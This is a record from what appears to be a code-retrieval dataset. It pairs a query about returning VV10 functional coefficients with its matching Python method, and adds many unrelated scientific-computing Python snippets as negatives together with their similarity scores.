\"\", self.double_digits, self.sigma_star, direction=\"ltr\") *\n pynini.cdrewrite(self.tens_map, \"\", self.digits, self.sigma_star, direction=\"ltr\") *\n pynini.cdrewrite(self.teens_map, \"\", \"\", self.sigma_star, direction=\"ltr\") *\n pynini.cdrewrite(self.ones_map, \"\", \"\", self.sigma_star, direction=\"ltr\") *\n pynini.cdrewrite(self.zero_del, \"\", \"\", self.sigma_star, direction=\"ltr\")\n )", "def betabinom_B(k,n, alpha,beta, precision=50):\n mp.dps = precision # Set precision\n #return float( mpmath.gamma(k+alpha) * mpmath.gamma(n-k+beta) / mpmath.gamma(alpha+n+beta) )\n return float(mpmath.beta(k+alpha, n-k+beta))", "def params(self) -> Iterable[sympy.Symbol]:\n for i in range(self.iterations):\n for p in range(len(self.qubits)):\n if (self.include_all_z or not\n numpy.isclose(self.orbital_energies[p], 0)):\n yield LetterWithSubscripts('U', p, i)\n for p, q in itertools.combinations(range(len(self.qubits)), 2):\n if (self.include_all_cz or not\n numpy.isclose(self.hamiltonian.two_body[p, q], 0)):\n yield LetterWithSubscripts('V', p, q, i)", "def bethe_gf_omega(z, t=1.0):\n half_bandwidth = 2 * t\n z_rel = z / half_bandwidth\n return 2. / half_bandwidth * z_rel * (1 - np.sqrt(1 - 1 / (z_rel * z_rel)))", "def get_phi_chi_omega(self, angles):\n phi = angles[0]\n chi = np.deg2rad(self.chi)\n omega = 0\n return (phi, chi, omega)", "def get_xray_delta_beta_intrinsic(self, energy=13.0):\n \n delta, beta = self.get_xray_delta_beta(energy)\n \n delta *= self.get_molecular_weight()/self.get_density()\n beta *= self.get_molecular_weight()/self.get_density()\n \n return delta, beta", "def _se_beta(self):\n return _handle_ab(self._se_all, self.use_const)[1]", "def boost(self):\n ch = self.gamma\n sh = self.gamma*self.beta\n return( np.array( [ [ch, -sh], [-sh, ch] ] ) )", "def get_quantities(seq):\n outcomes = get_outcomes(NUM_DIE_SIDES)\n quants = [seq.count(value) for value in outcomes]\n return quants", "def v_atm_n(f, t, alpha, beta, rho, volvol):\r\n f_av = f\r\n A = - beta * (2 - beta) * alpha**2 / (24 * f_av**(2 - 2 * beta))\r\n B = rho * alpha * volvol * beta / (4 * f_av**(1 - beta))\r\n C = (2 - 3 * rho**2) * volvol**2 / 24\r\n v_atm_n = alpha * f**beta * (1 + (A + B + C) * t)\r\n return v_atm_n", "def HP(Di, beta):\n Pi = np.exp(-Di * beta) / np.sum(np.exp(-Di * beta))\n Hi = - np.sum(Pi * np.log2(Pi))\n return Hi, Pi", "def multivariate (mu, alpha, omega, T, numEvents=None, checkStability=False, seed=None):\n\tprng = sklearn.utils.check_random_state (seed)\n\tdim = mu.shape[0]\n\talpha = alpha.tocsr().toarray() # just keep them dense (I'm sure the simulation can be made faster by exploiting sparsity)\n\tnTotal = 0\n\thistory = list ()\n\t# Initialization\n\tif numEvents is None:\n\t\tnExpected = np.iinfo (np.int32).max\n\telse:\n\t\tnExpected = numEvents\n\ts = 0.0\n\n\tif checkStability:\n\t\tw,v = np.linalg.eig (alpha)\n\t\tmaxEig = np.amax (np.abs(w))\n\t\tif maxEig >= 1:\n\t\t\tprint \"(WARNING) Unstable ... max eigen value is: {0}\".format (maxEig)\n\n\tIstar = np.sum(mu)\n\ts += HPUtils.drawExpRV (1./Istar, prng)\n\n\tif s <=T and nTotal < nExpected:\n\t\t# attribute (weighted random sample, since sum(mu)==Istar)\n\t\tn0 = int(prng.choice(np.arange(dim), 1, p=(mu / Istar)))\n\t\thistory.append((n0, s))\n\t\tnTotal += 1\n\n\t# value of \\lambda(t_k) where k is most recent event\n\t# starts with just the base rate\n\tlastrates = mu.copy()\n\n\tdecIstar = False\n\twhile nTotal < nExpected:\n\t\tuj, tj = int (history[-1][0]), history[-1][1]\n\n\t\tif decIstar:\n\t\t\t# if last event was rejected, decrease Istar\n\t\t\tIstar = np.sum(rates)\n\t\t\tdecIstar = False\n\t\telse:\n\t\t\t# otherwise, we just had an event, so recalc Istar (inclusive of last event)\n\t\t\tIstar = np.sum(lastrates) + alpha[uj,:].sum()\n\t\t\t\n\t\ts += HPUtils.drawExpRV (1./Istar, prng)\n\t\tif s > T:\n\t\t\tbreak\n\n\t\t# calc rates at time s (use trick to take advantage of rates at last event)\n\t\trates = mu + HPUtils.kernel (s,tj,omega) * (alpha[uj,:] + lastrates - mu)\n\n\t\t# attribution/rejection test\n\t\t# handle attribution and thinning in one step as weighted random sample\n\t\tdiff = Istar - np.sum(rates)\n\t\tn0 = int (prng.choice(np.arange(dim+1), 1, p=(np.append(rates, diff) / Istar)))\n\n\t\tif n0 < dim:\n\t\t\thistory.append((n0, s))\n\t\t\t# update lastrates\n\t\t\tlastrates = rates.copy()\n\t\t\tnTotal += 1\n\t\telse:\n\t\t\tdecIstar = True\n\n\treturn history", "def get_quantity( self, species, quantity ) :\n\n #NB (for developers): this is a very simple implementation\n #one must take care of the order of search of particle quantities\n #'ux','uy','uz' etc. so that the routine effectively works by just\n #using the replace method on strings. In addition, double character\n #quantities containing other quantitities (e.g 'ex' contains 'x')\n #are replaced with numbered quantities 'e1' to avoid collisions\n #with replace().\n\n dict_keys_val=dict()\n if \"ux\" in quantity :\n dict_keys_val[\"u1\"]=species.getux(gather=False)\n quantity=quantity.replace(\"ux\",\"u1\")\n if \"uy\" in quantity :\n dict_keys_val[\"u2\"]=species.getuy(gather=False)\n quantity=quantity.replace(\"uy\",\"u2\")\n if \"uz\" in quantity :\n dict_keys_val[\"u3\"]=species.getuz(gather=False)\n quantity=quantity.replace(\"uz\",\"u3\")\n if \"ex\" in quantity :\n dict_keys_val[\"e1\"]=species.getex(gather=False)\n quantity=quantity.replace(\"ex\",\"e1\")\n if \"ey\" in quantity :\n dict_keys_val[\"e2\"]=species.getey(gather=False)\n quantity=quantity.replace(\"ey\",\"e2\")\n if \"ez\" in quantity :\n dict_keys_val[\"e3\"]=species.getez(gather=False)\n quantity=quantity.replace(\"ez\",\"e3\")\n if \"bx\" in quantity :\n dict_keys_val[\"b1\"]=species.getbx(gather=False)\n quantity=quantity.replace(\"bx\",\"b1\")\n if \"by\" in quantity :\n dict_keys_val[\"b2\"]=species.getby(gather=False)\n quantity=quantity.replace(\"by\",\"b2\")\n if \"bz\" in quantity :\n dict_keys_val[\"b3\"]=species.getbz(gather=False)\n quantity=quantity.replace(\"bz\",\"b3\")\n if \"w\" in quantity :\n dict_keys_val[\"w\"]=species.getweights(gather=False)\n if \"x\" in quantity :\n dict_keys_val[\"x\"]=species.getx(gather=False)\n if \"y\" in quantity :\n dict_keys_val[\"y\"]=species.gety(gather=False)\n if \"z\" in quantity :\n dict_keys_val[\"z\"]=species.getz(gather=False)\n if \"id\" in quantity:\n # The ssnid is stored in Warp as a float. Thus, it needs\n # to be converted to the nearest integer (rint)\n dict_keys_val[\"id\"] = \\\n (np.rint( species.getssn(gather=False) )).astype('uint64')\n\n string_to_exec=quantity\n for keys in dict_keys_val.keys():\n string_to_exec=string_to_exec.replace(keys,\"dict_keys_val[\\'\"+keys+\"\\']\")\n string_to_exec='quantity_array = '+string_to_exec\n local_dict = {'dict_keys_val':dict_keys_val, 'quantity_array':None}\n exec(string_to_exec, globals(), local_dict)\n\n return( local_dict['quantity_array'] )", "def nu(x, beta2):\n return 3 * (1 - beta2 - beta2*x) / beta2 / (1+x)", "def int_z(sigma, omega, mu, tau, T, R, k, d, m_max, epsilon=1):\r\n\r\n term0 = k**2*special.k0(k*d)**2*np.imag(r(0, sigma, omega, mu, tau, T, R, k, epsilon))\r\n terms_array = np.array([k**2*special.kn(m,k*d)**2*np.imag(r(m, sigma, omega, mu, tau, T, R, k, epsilon)) for m in range(1,m_max + 1)])\r\n result = term0 + 2*np.sum(terms_array)\r\n\r\n return result", "def get_xray_delta_beta_intrinsic(self, energy=13.0):\n \n delta, beta = self.get_xray_delta_beta(energy)\n delta *= self.atomic_weight/self.density\n beta *= self.atomic_weight/self.density\n \n return delta, beta" ]
[ "0.67075425", "0.5999553", "0.5995143", "0.59202677", "0.58304745", "0.5786519", "0.5735779", "0.572618", "0.5639546", "0.5626567", "0.5616059", "0.55831593", "0.55683064", "0.55592185", "0.5534734", "0.55158263", "0.54844254", "0.5464986", "0.54503083", "0.54469895", "0.54469895", "0.54469895", "0.5434943", "0.5424529", "0.54205906", "0.5419117", "0.5419117", "0.54167914", "0.5404991", "0.53718054", "0.53624165", "0.5346007", "0.53439355", "0.53205174", "0.53182214", "0.5312419", "0.5306568", "0.5298138", "0.52847075", "0.5282694", "0.52786434", "0.52786434", "0.52780217", "0.526744", "0.526137", "0.526137", "0.52471316", "0.52405244", "0.5230655", "0.52164584", "0.5216119", "0.52156067", "0.52132326", "0.5203649", "0.5199213", "0.5174469", "0.51546615", "0.5151856", "0.5147292", "0.5145322", "0.51220256", "0.51188856", "0.51173496", "0.5114923", "0.5113227", "0.5112019", "0.50958", "0.5086159", "0.5085807", "0.50789833", "0.5078345", "0.50779134", "0.5066369", "0.5059184", "0.50559574", "0.50528127", "0.5044881", "0.50427645", "0.5041627", "0.50396454", "0.50309056", "0.5029234", "0.5028841", "0.5022241", "0.5020143", "0.5013216", "0.50054085", "0.5001823", "0.4999107", "0.4997633", "0.49926496", "0.4990528", "0.4984548", "0.49842045", "0.49727714", "0.4971862", "0.49706924", "0.4970078", "0.4968345", "0.4966744", "0.49661002" ]
0.0
-1
Returns the VV10 (b, C) coefficients
def get_vv10_coef(self): if self._nlc_b is False: raise ValueError("get_vv10_coeff can only be called on -V functionals.") return (self._nlc_b, self._nlc_C)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def coefficients(self):\r\n return self.coef_['x']", "def coefficients(self) :\n raise NotImplementedError", "def b_coefficients(x1,x2,x3,y1,y2,y3,CCoefficients,DCoefficients):\n\tBCoefficients = np.array([\t((y2-y1)/(x2-x1)-CCoefficients[0]*(x2-x1) - DCoefficients[0]*((x2-x1)**2)), \\\n\t\t\t\t\t\t\t\t((y3-y2)/(x3-x2)-CCoefficients[1]*(x3-x2) - DCoefficients[1]*((x3-x2)**2)) \t]).astype(float)\n\treturn(BCoefficients)", "def b10(self,k1,k2,c):\n return 2.0/3.0*(2.0+self.mu)*c.pkInterp(k1)*c.pkInterp(k2)", "def coefficients(self) :\n return self.__coefficients", "def test_coefficients(self):\n\n coefs = self.cs.coefficients\n\n self.assertEqual(coefs, (1, 0, 1, 0, 0, -1))", "def coefficients(self):\n return self._coefficients", "def coefficients(self):\n return self._coefficients", "def c_coefficients(x1,x2,x3,y1,y2,y3,initial_slope,final_slope):\n\tC = c_matrix(x1,x2,x3)\n\ty = y_vector(x1,x2,x3,y1,y2,y3,initial_slope,final_slope)\n\tCCoefficients = np.dot(inv(C),y)\n\treturn(CCoefficients)", "def coefficients(k, xi, x):\n\n import pyweno.cnonuniform\n\n x = np.asarray(x, np.float64)\n xi = np.asarray(xi, np.float64)\n\n nc = len(x) - 1\n n = len(xi)\n c = np.zeros((nc, n, k, k), np.float64)\n beta = np.zeros((nc, k, k, k), np.float64)\n varpi = np.zeros((nc, n, k), np.float64)\n\n pyweno.cnonuniform.nonuniform_coeffs(k, xi, x, c, beta, varpi)\n\n return c, beta, varpi", "def get_coefficients(self):\n return self.coefficients", "def get_coefficients(self):\n return self.coefficients", "def coefficients(self):\n if self._coefficients is None:\n return np.hstack([c.coefficients for c in self._traces])\n return self._coefficients", "def get_base_coefs(mv):\n\trs = []\n\tfor bs in bases:\n\t\tt = []\n\t\tfor b in bs:\n\t\t\tt.append(mv.coef(b))\n\t\t\t\t\t\n\t\trs.append(t)\t\t\n\treturn rs", "def langevin_coefficients(\n temperature,\n dt,\n friction,\n masses):\n vscale = np.exp(-dt*friction)\n if friction == 0:\n fscale = dt\n else:\n fscale = (1-vscale)/friction\n kT = BOLTZ * temperature\n nscale = np.sqrt(kT*(1-vscale*vscale)) # noise scale\n invMasses = 1.0/masses\n sqrtInvMasses = np.sqrt(invMasses)\n\n ca = vscale\n cb = fscale*invMasses\n cc = nscale*sqrtInvMasses\n return ca, cb, cc", "def coefficients(dataset):\r\n x = [row[0] for row in dataset]\r\n y = [row[1] for row in dataset]\r\n x_mean, y_mean = mean(x), mean(y)\r\n b1 = covariance(x, x_mean, y, y_mean) / variance(x, x_mean)\r\n b0 = y_mean - b1 * x_mean\r\n return [b0, b1]", "def coefficients(self) -> np.ndarray:\n return self._coefficients", "def circuit(V, I0, L, C, alpha, beta):\n Vdot = [V[0], V[0]/(psi(np.pi(/2))) # first and second derivative of V\n return Vdot[1] - (1/C) * (alpha - 3*gamma*V[0]**2)*Vdot[0] + 1/(L*C)*V[0]", "def coef_val():\n\n basepath = path.join(path.dirname(path.realpath('__file__')), 'data')\n fdata = basepath + path.sep + 'VAWTPolySurfaceCoef_pub.csv' # published coefficients from paper\n # fdata = basepath + path.sep + 'VAWTPolySurfaceCoef.csv' # polynomial surface fitting coefficients\n\n loc1 = np.zeros(10)\n loc2 = np.zeros(10)\n loc3 = np.zeros(10)\n spr1 = np.zeros(10)\n spr2 = np.zeros(10)\n skw1 = np.zeros(10)\n skw2 = np.zeros(10)\n scl1 = np.zeros(10)\n scl2 = np.zeros(10)\n scl3 = np.zeros(10)\n\n f = open(fdata)\n csv_f = csv.reader(f)\n\n i = 0\n for row in csv_f:\n if i != 0:\n loc1[i-1] = float(row[0])\n loc2[i-1] = float(row[1])\n loc3[i-1] = float(row[2])\n spr1[i-1] = float(row[3])\n spr2[i-1] = float(row[4])\n skw1[i-1] = float(row[5])\n skw2[i-1] = float(row[6])\n scl1[i-1] = float(row[7])\n scl2[i-1] = float(row[8])\n scl3[i-1] = float(row[9])\n i += 1\n\n f.close()\n\n return loc1,loc2,loc3,spr1,spr2,skw1,skw2,scl1,scl2,scl3", "def b11(self,k1,k2,c):\n return (k1/k2+k2/k1)*c.pkInterp(k1)*c.pkInterp(k2)", "def coeff(self):\n return self._coeff", "def coefficients(self, force_characters = False) :\n raise NotImplementedError", "def d_coefficients(x1,x2,x3,CCoefficients):\n\tDCoefficients = np.array([\t(CCoefficients[1]-CCoefficients[0])/(3*(x2-x1)), \\\n\t\t\t\t\t\t\t\t(CCoefficients[2]-CCoefficients[1])/(3*(x3-x2))\t], \\\n\t\t\t\t\t\t\t\tfloat)\n\treturn(DCoefficients)", "def coefC(x0,y0,x1,y1):\n return (x1*y0-x0*y1)/(x1-x0)", "def find_coefficients(self):\n self.make_matrix()\n self.coeffs = np.linalg.solve(self.global_matrix,self.global_vector)\n self.coeffs = np.append(self.coeffs, self.D) #Initial condition", "def mvector(B, c):\n # for Sun Mg Potential: c=1.6281689374348\n A = np.zeros(shape=4)\n A[0] = (2 / 3) * B[0]\n A[1] = 0.5 * ((2 / sqrt(3)) * B[1] - A[0])\n A[2] = -A[0] - A[1]\n A[3] = B[2] / c\n return A", "def _coef(ctx, J, eps):\n\n newJ = J+2 # compute more coefficients that are needed\n neweps6 = eps/2. # compute with a slight more precision that are needed\n\n # PREPARATION FOR THE COMPUTATION OF V(N) AND W(N)\n # See II Section 3.16\n #\n # Computing the exponent wpvw of the error II equation (81)\n wpvw = max(ctx.mag(10*(newJ+3)), 4*newJ+5-ctx.mag(neweps6))\n\n # Preparation of Euler numbers (we need until the 2*RS_NEWJ)\n E = ctx._eulernum(2*newJ)\n\n # Now we have in the cache all the needed Euler numbers.\n #\n # Computing the powers of pi\n #\n # We need to compute the powers pi**n for 1<= n <= 2*J\n # with relative error less than 2**(-wpvw)\n # it is easy to show that this is obtained\n # taking wppi as the least d with\n # 2**d>40*J and 2**d> 4.24 *newJ + 2**wpvw\n # In II Section 3.9 we need also that\n # wppi > wptcoef[0], and that the powers\n # here computed 0<= k <= 2*newJ are more\n # than those needed there that are 2*L-2.\n # so we need J >= L this will be checked\n # before computing tcoef[]\n wppi = max(ctx.mag(40*newJ), ctx.mag(newJ)+3 +wpvw)\n ctx.prec = wppi\n pipower = {}\n pipower[0] = ctx.one\n pipower[1] = ctx.pi\n for n in range(2,2*newJ+1):\n pipower[n] = pipower[n-1]*ctx.pi\n\n # COMPUTING THE COEFFICIENTS v(n) AND w(n)\n # see II equation (61) and equations (81) and (82)\n ctx.prec = wpvw+2\n v={}\n w={}\n for n in range(0,newJ+1):\n va = (-1)**n * ctx._eulernum(2*n)\n va = ctx.mpf(va)/ctx.fac(2*n)\n v[n]=va*pipower[2*n]\n for n in range(0,2*newJ+1):\n wa = ctx.one/ctx.fac(n)\n wa=wa/(2**n)\n w[n]=wa*pipower[n]\n\n # COMPUTATION OF THE CONVOLUTIONS RS_P1 AND RS_P2\n # See II Section 3.16\n ctx.prec = 15\n wpp1a = 9 - ctx.mag(neweps6)\n P1 = {}\n for n in range(0,newJ+1):\n ctx.prec = 15\n wpp1 = max(ctx.mag(10*(n+4)),4*n+wpp1a)\n ctx.prec = wpp1\n sump = 0\n for k in range(0,n+1):\n sump += ((-1)**k) * v[k]*w[2*n-2*k]\n P1[n]=((-1)**(n+1))*ctx.j*sump\n P2={}\n for n in range(0,newJ+1):\n ctx.prec = 15\n wpp2 = max(ctx.mag(10*(n+4)),4*n+wpp1a)\n ctx.prec = wpp2\n sump = 0\n for k in range(0,n+1):\n sump += (ctx.j**(n-k)) * v[k]*w[n-k]\n P2[n]=sump\n # COMPUTING THE COEFFICIENTS c[2n]\n # See II Section 3.14\n ctx.prec = 15\n wpc0 = 5 - ctx.mag(neweps6)\n wpc = max(6,4*newJ+wpc0)\n ctx.prec = wpc\n mu = ctx.sqrt(ctx.mpf('2'))/2\n nu = ctx.expjpi(3./8)/2\n c={}\n for n in range(0,newJ):\n ctx.prec = 15\n wpc = max(6,4*n+wpc0)\n ctx.prec = wpc\n c[2*n] = mu*P1[n]+nu*P2[n]\n for n in range(1,2*newJ,2):\n c[n] = 0\n return [newJ, neweps6, c, pipower]", "def cost_b_v(self):\n return self._cost_b_v", "def coefficient(self) -> float:\n ...", "def c(self) -> np.ndarray:\n return self._vector[10:12]", "def coef(self):\n return self._coef", "def __init__(self, coefficients):\n self.coefficients = coefficients", "def get_coeffs(self):\n\n return self._coeff_to_dict()", "def get_coefficients_Pd(self):\n B, A = self.get_coefficients()\n return (B[0], B[1], B[2], -A[1], -A[2]) # FIXME: Verify this", "def acc_b_v(self):\r\n return self._acc_b_v", "def xcoeff(self):\n a, c, d, b = self.to_ccw()\n p1, q1 = a + b, c + d\n p2, q2 = a + c, b + d\n n = p1 + q1\n\n cov = self.covar()\n\n if n == 0:\n return np.nan\n elif a == n or d == n:\n return 0.5\n elif b == n or c == n:\n return -1.0\n elif cov > 0.0:\n return _div(cov, min(p1 * q2, p2 * q1))\n elif cov < 0.0:\n return _div(cov, min(n * c, n * b))\n else:\n return 0.0", "def __getTemperatureCalibrationCoefficients(self):\n src10 = self.read_byte_data(self.address, 0x10)\n src11 = self.read_byte_data(self.address, 0x11)\n src12 = self.read_byte_data(self.address, 0x12)\n c0 = (src10 << 4) | (src11 >> 4)\n c0 = getTwosComplement(c0, 12)\n c1 = ((src11 & 0x0F) << 8) | src12\n c1 = getTwosComplement(c1, 12)\n return c0, c1", "def NPV(B,C,BV,CV,d,pb,pc):\n b=[BV[0] if x=='L' else BV[1] for x in B] #decoding revenue\n c=[CV[0] if x=='L' else CV[1] for x in C] #decoding cost\n z=[b_i - c_i for b_i, c_i in zip(b, c)] #profit at each time\n npv=np.npv(d, z)\n pnpv=pb*pc\n return (npv,pnpv)", "def V_int(A, B, Rab2, Rcp2, Zc):\n V = 2.0 * np.pi / (A + B) * F0((A + B) * Rcp2) * np.exp(-A * B * Rab2 / (A + B))\n return -V * Zc", "def pcoef(\n xte,yte,rle,\n x_cre,y_cre,d2ydx2_cre,th_cre,\n surface):\n\n # Initialize coefficients\n coef = np.zeros(6)\n\n # 1st coefficient depends on surface (pressure or suction)\n if surface.startswith('p'):\n coef[0] = -sqrt(2*rle)\n else:\n coef[0] = sqrt(2*rle)\n \n # Form system of equations\n A = np.array([\n [xte**1.5, xte**2.5, xte**3.5, xte**4.5, xte**5.5],\n [x_cre**1.5, x_cre**2.5, x_cre**3.5, x_cre**4.5, \n x_cre**5.5],\n [1.5*sqrt(xte), 2.5*xte**1.5, 3.5*xte**2.5, \n 4.5*xte**3.5, 5.5*xte**4.5],\n [1.5*sqrt(x_cre), 2.5*x_cre**1.5, 3.5*x_cre**2.5, \n 4.5*x_cre**3.5, 5.5*x_cre**4.5],\n [0.75*(1/sqrt(x_cre)), 3.75*sqrt(x_cre), 8.75*x_cre**1.5, \n 15.75*x_cre**2.5, 24.75*x_cre**3.5]\n ]) \n\n B = np.array([\n [yte - coef[0]*sqrt(xte)],\n [y_cre - coef[0]*sqrt(x_cre)],\n [tan(th_cre*pi/180) - 0.5*coef[0]*(1/sqrt(xte))],\n [-0.5*coef[0]*(1/sqrt(x_cre))],\n [d2ydx2_cre + 0.25*coef[0]*x_cre**(-1.5)]\n ])\n \n # Solve system of linear equations\n try:\n X = np.linalg.solve(A,B)\n except:\n X = np.linalg.solve(A+(1e-12*np.eye(5)),B)\n\n\n # Gather all coefficients\n coef[1:6] = X[0:5,0]\n\n # Return coefficients\n return coef", "def C(self, r, n=None):\n return self.get_coefficient(r, n)", "def coeffroot(self):\n return self._coeffroot", "def calculate_coefficients(self, start, end):\n A = np.array([\n [self.deltaT**3, self.deltaT**4, self.deltaT**5],\n [3 * self.deltaT**2, 4 * self.deltaT**3, 5 * self.deltaT**4],\n [6 * self.deltaT, 12 * self.deltaT**2, 20 * self.deltaT**3],\n ])\n\n a_0, a_1, a_2 = start[0], start[1], start[2] / 2.0\n c_0 = a_0 + a_1 * self.deltaT + a_2 * self.deltaT**2\n c_1 = a_1 + 2 * a_2 * self.deltaT\n c_2 = 2 * a_2\n\n B = np.array([\n end[0] - c_0,\n end[1] - c_1,\n end[2] - c_2\n ])\n\n a_3_4_5 = np.linalg.solve(A, B)\n coeff = np.concatenate((np.array([a_0, a_1, a_2]), a_3_4_5))\n\n return coeff", "def objfCVaR(self, beta, q, N):\n cvec = r_[1, zeros((N)), 1/(1-beta)*1/q*ones((q))];\n return cvec", "def C_V(self):\n return self.generic_getter(\n get_heat_capacity_volume, \"C_V\", \"convert_heat_capacity\"\n )", "def F(cst, x):\n [u0, v0, u1, v1, u2, v2, coeffs] = cst\n [u, v, g1, g2, g3] = x\n a = g1*u1 - u0\n b = g2*u2 - u0\n c = g3*u - u0\n l = g1*v1 - v0 \n m = g2*v2 - v0\n n = g3*v - v0\n r = g1 - 1\n s = g2 - 1\n t = g3 - 1\n return np.array([\n coeffs[0]*(a**2-l**2) + 2*coeffs[1]*(a*b-l*m) + coeffs[2]*(b**2-m**2) + 2*coeffs[3]*(a*c-l*n) + 2*coeffs[4]*(b*c-m*n) + c**2 - n**2,\n coeffs[0]*(l**2-r**2) + 2*coeffs[1]*(l*m-r*s) + coeffs[2]*(m**2-s**2) + 2*coeffs[3]*(l*n-r*t) + 2*coeffs[4]*(m*n-s*t) + n**2 - t**2,\n coeffs[0]*a*l + coeffs[1]*(l*b+m*a) + coeffs[2]*m*b + coeffs[3]*(l*c+n*a) + coeffs[4]*(m*c+b*n) + c*n,\n coeffs[0]*a*r + coeffs[1]*(r*b+s*a) + coeffs[2]*s*b + coeffs[3]*(r*c+t*a) + coeffs[4]*(s*c+b*t) + c*t,\n coeffs[0]*r*l + coeffs[1]*(l*s+m*r) + coeffs[2]*m*s + coeffs[3]*(l*t+n*r) + coeffs[4]*(m*t+s*n) + t*n \n ])", "def test_coefficients_torch_interface(self):\n import torch\n\n qnode = qml.QNode(self.circuit, self.dev)\n\n weights = torch.tensor([0.5, 0.2])\n\n obtained_result = coefficients(partial(qnode, weights), 2, 1)\n\n assert np.allclose(obtained_result, self.expected_result)", "def get_coeffs(b, q0, hL, g):\n\n C0 = q0 * q0 / (2. * g)\n C1 = b - C0 / (hL * hL) - hL\n\n return C0, C1", "def dV(X):\n return -4 * a * np.power(X, 3) + 2 * b * X", "def _vB0(self,x):\n return 2.4e3*x**0.5/(2+x**0.5)+8.e2", "def getCoeff(self, path, prefix, verbose = True):\n\n fpath = path + prefix + \".coeff\"\n # print 'get coeff path', fpath\n\n if not os.path.isfile(fpath):\n if verbose: print \".coeff file not found - please check!\"\n return False\n\n with open(fpath, \"rb\") as f:\n s = np.fromfile(f, count=4, dtype=np.int32)\n NFILT, NTEMP, NZ, NOBJ = s[0], s[1], s[2], s[3]\n coeffs = np.fromfile(f, count = NOBJ*NTEMP, dtype = np.double).reshape((NOBJ, NTEMP))\n izbest = np.fromfile(f, count = NOBJ, dtype = np.int32)\n tnorm = np.fromfile(f, count = NTEMP, dtype = np.double)\n\n keys = ['NFILT','NTEMP','NZ','NOBJ','coeffs','izbest','tnorm']\n values = [NFILT, NTEMP, NZ, NOBJ, coeffs, izbest, tnorm]\n\n if verbose: print \".coeff file found and read in correctly!\"\n return dict(zip(keys, values))", "def nth_order_const_coeff(*coeffs: List[Symbol], t: Symbol = t) -> Tuple[List[Symbol], Procedure]:\n\n # First, set up characteristic equation.\n char_eq_r, r = sympy.S.Zero, Dummy('r')\n\n for order, coeff in enumerate(coeffs[::-1]):\n char_eq_r += coeff * r ** order\n\n char_eq = Poly(char_eq_r, r)\n\n # Can't just call roots because it doesn't return rootof for unsolveable\n # polynomials.\n char_eq_roots = roots(char_eq, multiple=True)\n\n root_dict = defaultdict(int) # type: Dict[int, int]\n\n conjugate_roots = []\n for root in char_eq_roots:\n root_dict[root] += 1\n\n sols = []\n for root, mult in root_dict.items():\n for i in range(mult):\n if isinstance(root, RootOf):\n sols.append(t**i * exp(root*t))\n elif root.is_real:\n sols.append(t**i*exp(root*t))\n else:\n if root in conjugate_roots:\n continue\n reroot = re(root)\n imroot = im(root)\n conjugate_roots.append(conjugate(root))\n sols.append(t**i*exp(reroot*t) * sin(abs(imroot) * t))\n sols.append(t**i*exp(reroot*t) * cos(imroot * t))\n\n # collect roots for display\n p_roots = []\n count = 1\n for root, mult in root_dict.items():\n p_roots.append(Eq(Dummy('r_{}'.format(\n \",\".join([str(i) for i in range(count, count + mult)]))), root, evaluate=False))\n count += mult\n\n procedure = Procedure()\n procedure\\\n .text('Characteristic equation: ', nl=True)\\\n .eq(Eq(char_eq_r, 0, evaluate=False))\\\n .text('Roots: ')\\\n .equarr(p_roots)\\\n .text('General Solution: ', nl=True)\\\n .eq(Eq(Dummy('y'), to_general(sols)[0], evaluate=False))\n\n return sols, procedure", "def coefficients(self, force_characters = False) :\n if len(self.__coefficients) == 0 :\n return dict()\n elif not force_characters and len(self.__coefficients) == 1 :\n return self.__coefficients.values()[0] \n else :\n return self.__coefficients", "def calibration(N,kb,T,Ekinv,V):\n lamb = np.sqrt((N-1)*3*kb*T/(Ekinv*2))\n \n if lamb < 0.9999:\n V = lamb*V\n elif lamb>1.0001:\n V = lamb*V\n \n return V", "def test_cels():\n N = 999\n kcc = (np.random.rand(N) - 0.5) * 10\n pp = (np.random.rand(N) - 0.5) * 10\n cc = (np.random.rand(N) - 0.5) * 10\n ss = (np.random.rand(N) - 0.5) * 10\n\n res0 = [cel0(kc, p, c, s) for kc, p, c, s in zip(kcc, pp, cc, ss)]\n res1 = celv(kcc, pp, cc, ss)\n res2 = cel(kcc, pp, cc, ss)\n\n assert np.allclose(res0, res1)\n assert np.allclose(res1, res2)", "def _coefficients(regression_df):\n coeff_names = ('mindist', 'x_j', 'f_is', 'v_is')\n coefficients = {x: _get_coefficient(regression_df, x) for x in coeff_names}\n return coefficients", "def vcapcharge(t, Vs, R, C):\n if t < 0:\n raise ValueError(\"Time must be greater than or equal to zero.\")\n if R * C == 0:\n raise ValueError(\"Resistance and Capacitance must be non-zero.\")\n Vc = Vs * (1 - _np.exp(-t / (R * C)))\n return Vc", "def coeff_b(nrows, ncols) -> np.ndarray:\n coeff_array = np.zeros((nrows, ncols), dtype=\"complex_\")\n for idx, _ in np.ndenumerate(coeff_array):\n coeff_array[idx] = 1j * (idx[0] - idx[1])\n return coeff_array", "def CirculationFromPrescribedCt(vr_bar,vCt,Lambda,bSwirl):\n vk = np.zeros(vr_bar.shape)\n vlambda_r = Lambda * vr_bar\n if bSwirl:\n for ir,(r_bar,lambda_r,Ct) in enumerate(zip(vr_bar,vlambda_r,vCt)):\n if Ct>0 and r_bar>0:\n res=sciopt.minimize_scalar(lambda k:np.abs(k*(1+k/(4*lambda_r**2))-Ct), bounds=[0,1.8], method='bounded')\n vk[ir] = res.x\n else:\n vk = vCt\n return vk", "def CirculationFromPrescribedCt(vr_bar,vCt,Lambda,bSwirl):\n vk = np.zeros(vr_bar.shape)\n vlambda_r = Lambda * vr_bar\n if bSwirl:\n for ir,(r_bar,lambda_r,Ct) in enumerate(zip(vr_bar,vlambda_r,vCt)):\n if Ct>0 and r_bar>0:\n res=sciopt.minimize_scalar(lambda k:np.abs(k*(1+k/(4*lambda_r**2))-Ct), bounds=[0,1.8], method='bounded')\n vk[ir] = res.x\n else:\n vk = vCt\n return vk", "def get_conditional_probs_asbf( p01, p10, v):\n\n ns,L =v.shape\n if ns != 2**L:\n raise ValueError\n #matrix of conitional probs.\n pi = np.zeros((ns,ns))\n p00 = 1-p10\n p11 = 1-p01\n for i in range(ns):\n #final state\n si = v[i,:]\n for j in range(i,ns):\n #initial state\n sj = v[j, :]\n #number of sites where 1->1 transition occurs, etc\n n11 = np.sum((si==1)*(sj==1))\n n10 = np.sum((si==1)*(sj==0))\n n01 = np.sum((si==0)*(sj==1))\n n00 = np.sum((si==0)*(sj==0))\n pi[i, j] = (p11**n11)*(p10**n10)*(p01**n01)*(p00**n00)\n pi[j,i] = (p11**n11)*(p10**n01)*(p01**n10)*(p00**n00)\n return pi", "def beta_model(r, s0, rc, beta, c):\n return s0 * 